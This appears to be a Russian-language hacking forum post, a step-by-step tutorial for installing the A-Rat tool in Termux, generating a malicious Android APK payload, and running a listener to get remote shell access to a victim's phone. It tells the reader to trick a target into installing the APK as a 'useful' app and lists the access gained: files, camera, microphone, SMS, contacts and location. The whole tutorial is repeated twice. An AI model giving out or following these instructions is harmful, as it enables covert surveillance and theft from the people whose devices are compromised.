- Регистрация
- 8 Янв 2019
- Сообщения
- 527
- Реакции
- 71
- Баллы
- 118
Приветствую, хакеры! В этом подробном материале вы узнаете, как с помощью Termux и инструмента A-Rat создать полноценный RAT и использовать его для удалённого доступа к Android-устройству. Статья предназначена исключительно для ознакомления и демонстрирует, как работает подобный инструментарий.
---
Подготовка Termux
Перед началом убедитесь, что Termux установлен. Затем открываем приложение и обновляем систему:
pkg update && pkg upgrade
Устанавливаем необходимые пакеты:
pkg install git python2
---
Установка инструмента A-Rat
Клонируем репозиторий A-Rat с GitHub:
git clone https://github.com/RexTheGod/A-Rat
cd A-Rat
Запускаем сам инструмент:
python2 A-Rat.py
---
Работа с интерфейсом A-Rat
После запуска откроется командная оболочка. Введите команду:
help
Вы получите список доступных функций, включая создание payload-файла (вредоносного APK), запуск listener’а и прочее.
---
Создание payload
Для генерации вредоносного APK-файла используйте команду:
generate payload
Далее вас попросят указать:
LHOST — IP-адрес, на который бот должен отправлять соединение (ваш локальный или внешний IP).
LPORT — порт для прослушивания.
Output name — имя итогового файла.
После генерации файл появится в директории проекта. Отправьте его целевому пользователю под предлогом установки «полезного» приложения.
---
Запуск прослушки
Для начала прослушивания входящих соединений от скомпрометированного устройства:
start listener
Если жертва откроет APK и даст нужные разрешения — вы получите shell-доступ и сможете:
Просматривать файлы
Активировать камеру и микрофон
Отправлять команды
Получать доступ к SMS, контактам, геолокации и т.д.
---
Вывод
Инструмент A-Rat показывает, насколько легко на практике создать вредоносный APK и получить удалённый доступ. Именно поэтому важно:
Не устанавливать сторонние APK с подозрительных источников
Использовать антивирус и sandbox-решения
Ограничить доступ к чувствительным разрешениям приложений.
---
Подготовка Termux
Перед началом убедитесь, что Termux установлен. Затем открываем приложение и обновляем систему:
pkg update && pkg upgrade
Устанавливаем необходимые пакеты:
pkg install git python2
---
Установка инструмента A-Rat
Клонируем репозиторий A-Rat с GitHub:
git clone https://github.com/RexTheGod/A-Rat
cd A-Rat
Запускаем сам инструмент:
python2 A-Rat.py
---
Работа с интерфейсом A-Rat
После запуска откроется командная оболочка. Введите команду:
help
Вы получите список доступных функций, включая создание payload-файла (вредоносного APK), запуск listener’а и прочее.
---
Создание payload
Для генерации вредоносного APK-файла используйте команду:
generate payload
Далее вас попросят указать:
LHOST — IP-адрес, на который бот должен отправлять соединение (ваш локальный или внешний IP).
LPORT — порт для прослушивания.
Output name — имя итогового файла.
После генерации файл появится в директории проекта. Отправьте его целевому пользователю под предлогом установки «полезного» приложения.
---
Запуск прослушки
Для начала прослушивания входящих соединений от скомпрометированного устройства:
start listener
Если жертва откроет APK и даст нужные разрешения — вы получите shell-доступ и сможете:
Просматривать файлы
Активировать камеру и микрофон
Отправлять команды
Получать доступ к SMS, контактам, геолокации и т.д.
---
Вывод
Инструмент A-Rat показывает, насколько легко на практике создать вредоносный APK и получить удалённый доступ. Именно поэтому важно:
Не устанавливать сторонние APK с подозрительных источников
Использовать антивирус и sandbox-решения
Ограничить доступ к чувствительным разрешениям приложений.

